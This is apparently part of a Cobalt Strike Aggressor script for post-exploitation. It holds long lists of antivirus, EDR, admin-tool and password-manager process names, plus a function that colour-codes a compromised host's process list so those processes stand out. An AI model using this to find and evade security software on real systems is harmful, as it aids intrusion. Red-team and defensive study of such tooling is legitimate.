"drweb386.exe", "drwebcgp.exe", "drwebcom.exe", "drwebdc.exe", "drwebmng.exe", "drwebscd.exe", "drwebupw.exe", "drwebwcl.exe", "drwebwin.exe", "drwupgrade.exe", "dsmain.exe", "dssagent.exe", "dvp95.exe", "dvp95_0.exe", "dwengine.exe", "dwhwizrd.exe", "dwwin.exe", "ecengine.exe", "edisk.exe", "efpeadm.exe", "egui.exe", "ekrn.exe", "elogsvc.exe", "emet_agent.exe", "emet_service.exe", "emsw.exe", "engineserver.exe", "ent.exe", "era.exe", "esafe.exe", "escanhnt.exe", "escanv95.exe", "esecagntservice.exe", "esecservice.exe", "esmagent.exe", "espwatch.exe", "etagent.exe", "ethereal.exe", "etrustcipe.exe", "evpn.exe", "evtProcessEcFile.exe", "evtarmgr.exe", "evtmgr.exe", "exantivirus-cnet.exe", "exe.avxw.exe", "execstat.exe", "expert.exe", "explore.exe", "f-agnt95.exe", "f-prot.exe", "f-prot95.exe", "f-stopw.exe", "fameh32.exe", "fast.exe", "fch32.exe", "fih32.exe", "findviru.exe", "firesvc.exe", "firetray.exe", "firewall.exe", "fmon.exe", "fnrb32.exe", "fortifw.exe", "fp-win.exe", 
"fp-win_trial.exe", "fprot.exe", "frameworkservice.exe", "frminst.exe", "frw.exe", "fsaa.exe", "fsaua.exe", "fsav.exe", "fsav32.exe", "fsav530stbyb.exe", "fsav530wtbyb.exe", "fsav95.exe", "fsavgui.exe", "fscuif.exe", "fsdfwd.exe", "fsgk32.exe", "fsgk32st.exe", "fsguidll.exe", "fsguiexe.exe", "fshdll32.exe", "fsm32.exe", "fsma32.exe", "fsmb32.exe", "fsorsp.exe", "fspc.exe", "fspex.exe", "fsqh.exe", "fssm32.exe", "fwinst.exe", "gator.exe", "gbmenu.exe", "gbpoll.exe", "gcascleaner.exe", "gcasdtserv.exe", "gcasinstallhelper.exe", "gcasnotice.exe", "gcasserv.exe", "gcasservalert.exe", "gcasswupdater.exe", "generics.exe", "gfireporterservice.exe", "ghost_2.exe", "ghosttray.exe", "giantantispywaremain.exe", "giantantispywareupdater.exe", "gmt.exe", "guard.exe", "guarddog.exe", "guardgui.exe", "hacktracersetup.exe", "hbinst.exe", "hbsrv.exe", "hipsvc.exe", "hotactio.exe", "hotpatch.exe", "htlog.exe", "htpatch.exe", "hwpe.exe", "hxdl.exe", "hxiul.exe", "iamapp.exe", "iamserv.exe", "iamstats.exe", "ibmasn.exe", "ibmavsp.exe", "icepack.exe", "icload95.exe", "icloadnt.exe", "icmon.exe", "icsupp95.exe", "icsuppnt.exe", "idle.exe", "iedll.exe", "iedriver.exe", "iface.exe", "ifw2000.exe", "igateway.exe", "inetlnfo.exe", "infus.exe", "infwin.exe", "inicio.exe", "init.exe", "inonmsrv.exe", "inorpc.exe", "inort.exe", "inotask.exe", "intdel.exe", "intren.exe", "iomon98.exe", "isPwdSvc.exe", "isUAC.exe", "isafe.exe", "isafinst.exe", "issvc.exe", "istsvc.exe", "jammer.exe", "jdbgmrg.exe", "jedi.exe", "kaccore.exe", "kansgui.exe", "kansvr.exe", "kastray.exe", "kav.exe", "kav32.exe", "kavfs.exe", "kavfsgt.exe", "kavfsrcn.exe", "kavfsscs.exe", "kavfswp.exe", "kavisarv.exe", "kavlite40eng.exe", "kavlotsingleton.exe", "kavmm.exe", "kavpers40eng.exe", "kavpf.exe", "kavshell.exe", "kavss.exe", "kavstart.exe", "kavsvc.exe", "kavtray.exe", "kazza.exe", "keenvalue.exe", "kerio-pf-213-en-win.exe", "kerio-wrl-421-en-win.exe", "kerio-wrp-421-en-win.exe", "kernel32.exe", "killprocesssetup161.exe", 
"kis.exe", "kislive.exe", "kissvc.exe", "klnacserver.exe", "klnagent.exe", "klserver.exe", "klswd.exe", "klwtblfs.exe", "kmailmon.exe", "knownsvr.exe", "kpf4gui.exe", "kpf4ss.exe", "kpfw32.exe", "kpfwsvc.exe", "krbcc32s.exe", "kvdetech.exe", "kvolself.exe", "kvsrvxp.exe", "kvsrvxp_1.exe", "kwatch.exe", "kwsprod.exe", "kxeserv.exe", "launcher.exe", "ldnetmon.exe", "ldpro.exe", "ldpromenu.exe", "ldscan.exe", "leventmgr.exe", "livesrv.exe", "lmon.exe", "lnetinfo.exe", "loader.exe", "localnet.exe", "lockdown.exe", "lockdown2000.exe", "log_qtine.exe", "lookout.exe", "lordpe.exe", "lsetup.exe", "luall.exe", "luau.exe", "lucallbackproxy.exe", "lucoms.exe", "lucomserver.exe", "lucoms~1.exe", "luinit.exe", "luspt.exe", "makereport.exe", "mantispm.exe", "mapisvc32.exe", "masalert.exe", "massrv.exe", "mcafeefire.exe", "mcagent.exe", "mcappins.exe", "mcconsol.exe", "mcdash.exe", "mcdetect.exe", "mcepoc.exe", "mcepocfg.exe", "mcinfo.exe", "mcmnhdlr.exe", "mcmscsvc.exe", "mcods.exe", "mcpalmcfg.exe", "mcpromgr.exe", "mcregwiz.exe", "mcscript.exe", "mcscript_inuse.exe", "mcshell.exe", "mcshield.exe", "mcshld9x.exe", "mcsysmon.exe", "mctool.exe", "mctray.exe", "mctskshd.exe", "mcuimgr.exe", "mcupdate.exe", "mcupdmgr.exe", "mcvsftsn.exe", "mcvsrte.exe", "mcvsshld.exe", "mcwce.exe", "mcwcecfg.exe", "md.exe", "mfeann.exe", "mfevtps.exe", "mfin32.exe", "mfw2en.exe", "mfweng3.02d30.exe", "mgavrtcl.exe", "mgavrte.exe", "mghtml.exe", "mgui.exe", "minilog.exe", "mmod.exe", "monitor.exe", "monsvcnt.exe", "monsysnt.exe", "moolive.exe", "mostat.exe", "mpcmdrun.exe", "mpf.exe", "mpfagent.exe", "mpfconsole.exe", "mpfservice.exe", "mpftray.exe", "mps.exe", "mpsevh.exe", "mpsvc.exe", "mrf.exe", "mrflux.exe", "msapp.exe", "msascui.exe", "msbb.exe", "msblast.exe", "mscache.exe", "msccn32.exe", "mscifapp.exe", "mscman.exe", "msconfig.exe", "msdm.exe", "msdos.exe", "msiexec16.exe", "mskagent.exe", "mskdetct.exe", "msksrver.exe", "msksrvr.exe", "mslaugh.exe", "msmgt.exe", "msmpeng.exe", 
"msmsgri32.exe", "msscli.exe", "msseces.exe", "mssmmc32.exe", "msssrv.exe", "mssys.exe", "msvxd.exe", "mu0311ad.exe", "mwatch.exe", "myagttry.exe", "n32scanw.exe", "nSMDemf.exe", "nSMDmon.exe", "nSMDreal.exe", "nSMDsch.exe", "naPrdMgr.exe", "nav.exe", "navap.navapsvc.exe", "navapsvc.exe", "navapw32.exe", "navdx.exe", "navlu32.exe", "navnt.exe", "navstub.exe", "navw32.exe", "navwnt.exe", "nc2000.exe", "ncinst4.exe", "MSASCuiL.exe");
11 | @av1 = @("MBAMService.exe", "mbamtray.exe", "CylanceSvc.exe", "ndd32.exe", "ndetect.exe", "neomonitor.exe", "neotrace.exe", "neowatchlog.exe", "netalertclient.exe", "netarmor.exe", "netcfg.exe", "netd32.exe", "netinfo.exe", "netmon.exe", "netscanpro.exe", "netspyhunter-1.2.exe", "netstat.exe", "netutils.exe", "networx.exe", "ngctw32.exe", "ngserver.exe", "nip.exe", "nipsvc.exe", "nisoptui.exe", "nisserv.exe", "nisum.exe", "njeeves.exe", "nlsvc.exe", "nmain.exe", "nod32.exe", "nod32krn.exe", "nod32kui.exe", "normist.exe", "norton_internet_secu_3.0_407.exe", "notstart.exe", "npf40_tw_98_nt_me_2k.exe", "npfmessenger.exe", "npfmntor.exe", "npfmsg.exe", "nprotect.exe", "npscheck.exe", "npssvc.exe", "nrmenctb.exe", "nsched32.exe", "nscsrvce.exe", "nsctop.exe", "nsmdtr.exe", "nssys32.exe", "nstask32.exe", "nsupdate.exe", "nt.exe", "ntcaagent.exe", "ntcadaemon.exe", "ntcaservice.exe", "ntrtscan.exe", "ntvdm.exe", "ntxconfig.exe", "nui.exe", "nupgrade.exe", "nvarch16.exe", "nvc95.exe", "nvcoas.exe", "nvcsched.exe", "nvsvc32.exe", "nwinst4.exe", "nwservice.exe", "nwtool16.exe", "nymse.exe", "oasclnt.exe", "oespamtest.exe", "ofcdog.exe", "ofcpfwsvc.exe", "okclient.exe", "olfsnt40.exe", "ollydbg.exe", "onsrvr.exe", "op_viewer.exe", "opscan.exe", "optimize.exe", "ostronet.exe", "otfix.exe", "outpost.exe", "outpostinstall.exe", "outpostproinstall.exe", "paamsrv.exe", "padmin.exe", "pagent.exe", "pagentwd.exe", "panixk.exe", "patch.exe", "pavbckpt.exe", "pavcl.exe", "pavfires.exe", "pavfnsvr.exe", "pavjobs.exe", "pavkre.exe", "pavmail.exe", "pavprot.exe", "pavproxy.exe", "pavprsrv.exe", "pavsched.exe", "pavsrv50.exe", "pavsrv51.exe", "pavsrv52.exe", "pavupg.exe", "pavw.exe", "pccNT.exe", "pccclient.exe", "pccguide.exe", "pcclient.exe", "pccnt.exe", "pccntmon.exe", "pccntupd.exe", "pccpfw.exe", "pcctlcom.exe", "pccwin98.exe", "pcfwallicon.exe", "pcip10117_0.exe", "pcscan.exe", "pctsAuxs.exe", "pctsGui.exe", "pctsSvc.exe", "pctsTray.exe", "pdsetup.exe", "pep.exe", 
"periscope.exe", "persfw.exe", "perswf.exe", "pf2.exe", "pfwadmin.exe", "pgmonitr.exe", "pingscan.exe", "platin.exe", "pmon.exe", "pnmsrv.exe", "pntiomon.exe", "pop3pack.exe", "pop3trap.exe", "poproxy.exe", "popscan.exe", "portdetective.exe", "portmonitor.exe", "powerscan.exe", "ppinupdt.exe", "ppmcativedetection.exe", "pptbc.exe", "ppvstop.exe", "pqibrowser.exe", "pqv2isvc.exe", "prevsrv.exe", "prizesurfer.exe", "prmt.exe", "prmvr.exe", "programauditor.exe", "proport.exe", "protectx.exe", "psctris.exe", "psh_svc.exe", "psimreal.exe", "psimsvc.exe", "pskmssvc.exe", "pspf.exe", "purge.exe", "pview.exe", "pviewer.exe", "pxemtftp.exe", "pxeservice.exe", "qclean.exe", "qconsole.exe", "qdcsfs.exe", "qoeloader.exe", "qserver.exe", "rapapp.exe", "rapuisvc.exe", "ras.exe", "rasupd.exe", "rav7.exe", "rav7win.exe", "rav8win32eng.exe", "ravmon.exe", "ravmond.exe", "ravstub.exe", "ravxp.exe", "ray.exe", "rb32.exe", "rcsvcmon.exe", "rcsync.exe", "realmon.exe", "reged.exe", "remupd.exe", "reportsvc.exe", "rescue.exe", "rescue32.exe", "rfwmain.exe", "rfwproxy.exe", "rfwsrv.exe", "rfwstub.exe", "rnav.exe", "rrguard.exe", "rshell.exe", "rsnetsvr.exe", "rstray.exe", "rtvscan.exe", "rtvscn95.exe", "rulaunch.exe", "saHookMain.exe", "safeboxtray.exe", "safeweb.exe", "sahagent.exescan32.exe", "sav32cli.exe", "save.exe", "savenow.exe", "savroam.exe", "savscan.exe", "savservice.exe", "sbserv.exe", "scam32.exe", "scan32.exe", "scan95.exe", "scanexplicit.exe", "scanfrm.exe", "scanmailoutlook.exe", "scanpm.exe", "schdsrvc.exe", "schupd.exe", "scrscan.exe", "seestat.exe", "serv95.exe", "setloadorder.exe", "setup_flowprotector_us.exe", "setupguimngr.exe", "setupvameeval.exe", "sfc.exe", "sgssfw32.exe", "sh.exe", "shellspyinstall.exe", "shn.exe", "showbehind.exe", "shstat.exe", "siteadv.exe", "smOutlookPack.exe", "smc.exe", "smoutlookpack.exe", "sms.exe", "smsesp.exe", "smss32.exe", "sndmon.exe", "sndsrvc.exe", "soap.exe", "sofi.exe", "softManager.exe", "spbbcsvc.exe", "spf.exe", "sphinx.exe", 
"spideragent.exe", "spiderml.exe", "spidernt.exe", "spiderui.exe", "spntsvc.exe", "spoler.exe", "spoolcv.exe", "spoolsv32.exe", "spyxx.exe", "srexe.exe", "srng.exe", "srvload.exe", "srvmon.exe", "ss3edit.exe", "sschk.exe", "ssg_4104.exe", "ssgrate.exe", "st2.exe", "stcloader.exe", "stinger.exe", "stopp.exe", "stwatchdog.exe", "supftrl.exe", "support.exe", "supporter5.exe", "svcGenericHost", "svcharge.exe", "svchostc.exe", "svchosts.exe", "svcntaux.exe", "svdealer.exe", "svframe.exe", "svtray.exe", "swdsvc.exe", "sweep95.exe", "sweepnet.sweepsrv.sys.swnetsup.exe", "sweepsrv.exe", "swnetsup.exe", "swnxt.exe", "swserver.exe", "symlcsvc.exe", "symproxysvc.exe", "symsport.exe", "symtray.exe", "symwsc.exe", "sysdoc32.exe", "sysedit.exe", "sysupd.exe", "taskmo.exe", "taumon.exe", "tbmon.exe", "tbscan.exe", "tc.exe", "tca.exe", "tclproc.exe", "tcm.exe", "tdimon.exe", "tds-3.exe", "tds2-98.exe", "tds2-nt.exe", "teekids.exe", "tfak.exe", "tfak5.exe", "tgbob.exe", "titanin.exe", "titaninxp.exe", "tmas.exe", "tmlisten.exe", "tmntsrv.exe", "tmpfw.exe", "tmproxy.exe", "tnbutil.exe", "tpsrv.exe", "tracesweeper.exe", "trickler.exe", "trjscan.exe", "trjsetup.exe", "trojantrap3.exe", "trupd.exe", "tsadbot.exe", "tvmd.exe", "tvtmd.exe", "udaterui.exe", "undoboot.exe", "unvet32.exe", "updat.exe", "updtnv28.exe", "upfile.exe", "upgrad.exe", "uplive.exe", "urllstck.exe", "usergate.exe", "usrprmpt.exe", "utpost.exe", "v2iconsole.exe", "v3clnsrv.exe", "v3exec.exe", "v3imscn.exe", "vbcmserv.exe", "vbcons.exe", "vbust.exe", "vbwin9x.exe", "vbwinntw.exe", "vcsetup.exe", "vet32.exe", "vet95.exe", "vetmsg.exe", "vettray.exe", "vfsetup.exe", "vir-help.exe", "virusmdpersonalfirewall.exe", "vnlan300.exe", "vnpc3000.exe", "vpatch.exe", "vpc32.exe", "vpc42.exe", "vpfw30s.exe", "vprosvc.exe", "vptray.exe", "vrv.exe", "vrvmail.exe", "vrvmon.exe", "vrvnet.exe", "vscan40.exe", "vscenu6.02d30.exe", "vsched.exe", "vsecomr.exe", "vshwin32.exe", "vsisetup.exe", "vsmain.exe", "vsmon.exe", "vsserv.exe", 
"vsstat.exe", "vstskmgr.exe", "vswin9xe.exe", "vswinntse.exe", "vswinperse.exe", "w32dsm89.exe", "w9x.exe", "watchdog.exe", "webdav.exe", "webproxy.exe", "webscanx.exe", "webtrap.exe", "webtrapnt.exe", "wfindv32.exe", "wfxctl32.exe", "wfxmod32.exe", "wfxsnt40.exe", "whoswatchingme.exe", "wimmun32.exe", "win-bugsfix.exe", "winactive.exe", "winmain.exe", "winnet.exe", "winppr32.exe", "winrecon.exe", "winroute.exe", "winservn.exe", "winssk32.exe", "winstart.exe", "winstart001.exe", "wintsk32.exe", "winupdate.exe", "wkufind.exe", "wnad.exe", "wnt.exe", "wradmin.exe", "wrctrl.exe", "wsbgate.exe", "wssfcmai.exe", "wupdater.exe", "wupdt.exe", "wyvernworksfirewall.exe", "xagt.exe", "xagtnotif.exe", "xcommsvr.exe", "xfilter.exe", "xpf202en.exe", "zanda.exe", "zapro.exe", "zapsetup3001.exe", "zatutor.exe", "zhudongfangyu.exe", "zlclient.exe", "zlh.exe", "zonalm2601.exe", "zonealarm.exe", "cb.exe", "MsMpEng.exe", "MsSense.exe", "CSFalconService.exe", "CSFalconContainer.exe", "redcloak.exe", "OmniAgent.exe","CrAmTray.exe","AmSvc.exe","minionhost.exe","PylumLoader.exe","CrsSvc.exe");
12 | @admin = @("MobaXterm.exe", "bash.exe", "git-bash.exe", "mmc.exe", "Code.exe", "notepad++.exe", "notepad.exe", "cmd.exe", "drwatson.exe", "DRWTSN32.EXE", "drwtsn32.exe", "dumpcap.exe", "ethereal.exe", "filemon.exe", "idag.exe", "idaw.exe", "k1205.exe", "loader32.exe", "netmon.exe", "netstat.exe", "netxray.exe", "NmWebService.exe", "nukenabber.exe", "portmon.exe", "powershell.exe", "PRTG Traffic Gr.exe", "PRTG Traffic Grapher.exe", "prtgwatchdog.exe", "putty.exe", "regmon.exe", "SystemEye.exe", "taskman.exe", "TASKMGR.EXE", "tcpview.exe", "Totalcmd.exe", "TrafMonitor.exe", "windbg.exe", "winobj.exe", "wireshark.exe", "WMonAvNScan.exe", "WMonAvScan.exe", "WMonSrv.exe","regedit.exe", "regedit32.exe", "accesschk.exe", "accesschk64.exe", "AccessEnum.exe", "ADExplorer.exe", "ADInsight.exe", "adrestore.exe", "Autologon.exe", "Autoruns.exe", "Autoruns64.exe", "autorunsc.exe", "autorunsc64.exe", "Bginfo.exe", "Bginfo64.exe", "Cacheset.exe", "Clockres.exe", "Clockres64.exe", "Contig.exe", "Contig64.exe", "Coreinfo.exe", "ctrl2cap.exe", "Dbgview.exe", "Desktops.exe", "disk2vhd.exe", "diskext.exe", "diskext64.exe", "Diskmon.exe", "DiskView.exe", "du.exe", "du64.exe", "efsdump.exe", "FindLinks.exe", "FindLinks64.exe", "handle.exe", "handle64.exe", "hex2dec.exe", "hex2dec64.exe", "junction.exe", "junction64.exe", "ldmdump.exe", "Listdlls.exe", "Listdlls64.exe", "livekd.exe", "livekd64.exe", "LoadOrd.exe", "LoadOrd64.exe", "LoadOrdC.exe", "LoadOrdC64.exe", "logonsessions.exe", "logonsessions64.exe", "movefile.exe", "movefile64.exe", "notmyfault.exe", "notmyfault64.exe", "notmyfaultc.exe", "notmyfaultc64.exe", "ntfsinfo.exe", "ntfsinfo64.exe", "pagedfrg.exe", "pendmoves.exe", "pendmoves64.exe", "pipelist.exe", "pipelist64.exe", "portmon.exe", "procdump.exe", "procdump64.exe", "procexp.exe", "procexp64.exe", "Procmon.exe", "PsExec.exe", "PsExec64.exe", "psfile.exe", "psfile64.exe", "PsGetsid.exe", "PsGetsid64.exe", "PsInfo.exe", "PsInfo64.exe", "pskill.exe", "pskill64.exe", 
"pslist.exe", "pslist64.exe", "PsLoggedon.exe", "PsLoggedon64.exe", "psloglist.exe", "pspasswd.exe", "pspasswd64.exe", "psping.exe", "psping64.exe", "PsService.exe", "PsService64.exe", "psshutdown.exe", "pssuspend.exe", "pssuspend64.exe", "RAMMap.exe", "RegDelNull.exe", "RegDelNull64.exe", "regjump.exe", "ru.exe", "ru64.exe", "sdelete.exe", "sdelete64.exe", "ShareEnum.exe", "ShellRunas.exe", "sigcheck.exe", "sigcheck64.exe", "streams.exe", "streams64.exe", "strings.exe", "strings64.exe", "sync.exe", "sync64.exe", "Sysmon.exe", "Sysmon64.exe", "Tcpvcon.exe", "Tcpview.exe", "Testlimit.exe", "Testlimit64.exe", "vmmap.exe", "Volumeid.exe", "Volumeid64.exe", "whois.exe", "whois64.exe", "Winobj.exe", "ZoomIt.exe", "KeePass.exe", "1Password.exe", "lastpass.exe");
13 |
14 | local('$outps $temp $name $ppid $pid $arch $user $session @ps');
15 | $outps .= "\cC[*]\o Process List with process highlighting\n";
16 | $outps .= "\cC[*]\o Current Running PID: \c8 Yellow ". $bd['pid'] ." \o \n";
17 | $outps .= "\cC[*]\o Explorer/Winlogon: \c2 BLUE \o \n";
18 | $outps .= "\cC[*]\o Admin Tools: \cB LIGHT BLUE \o \n";
19 | $outps .= "\cC[*]\o Browsers: \c3 GREEN \o \n";
20 | $outps .= "\cC[*]\o AV/EDR: \c4 RED \o \n\n";
21 | $outps .= " PID PPID Name Arch Session User\n";
22 | $outps .= "\cE --- ---- ---- ---- ------- -----\n";
23 |
24 | foreach $temp (split("\n", ["$2" trim])) {
25 | ($name, $ppid, $pid, $arch, $user, $session) = split("\t", $temp);
26 | # highlight AV processes in RED.
27 | if(iff($name in @av,true,false)) {
28 | push(@ps, %(pid => $pid, entry => "\c4 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
29 | # highlight current process in YELLOW
30 | } else if ($pid eq $bd['pid']) {
31 | push(@ps, %(pid => $pid, entry => "\c8 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
32 | # highlight explorer , winlogon in BLUE
33 | } else if ($name eq "explorer.exe" || $name eq "winlogon.exe") {
34 | push(@ps, %(pid => $pid, entry => "\c2 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
35 | # highlight browsers processes in GREEN
36 | } else if ($name eq "chrome.exe" || $name eq "firefox.exe" || $name eq "iexplore.exe" || $name eq "MicrosoftEdgeCP.exe" || $name eq "MicrosoftEdge.exe") {
37 | push(@ps, %(pid => $pid, entry => "\c3 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
38 | # highlight av1 processes in RED.
39 | } else if(iff($name in @av1,true,false)) {
40 | push(@ps, %(pid => $pid, entry => "\c4 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
41 | # highlight Admin Tools in Light Blue
42 | } else if(iff($name in @admin,true,false)) {
43 | push(@ps, %(pid => $pid, entry => "\cB $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
44 | } else {
45 | push(@ps, %(pid => $pid, entry => " $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user"));
46 | }
47 | }
48 | # sort the processes please
49 | sort({ return $1['pid'] <=> $2['pid']; }, @ps);
50 | # append to our outstring
51 | foreach $temp (@ps) {
52 | $outps .= "$temp['entry'] \n";
53 | }
54 | return $outps;
55 | }
56 |
--------------------------------------------------------------------------------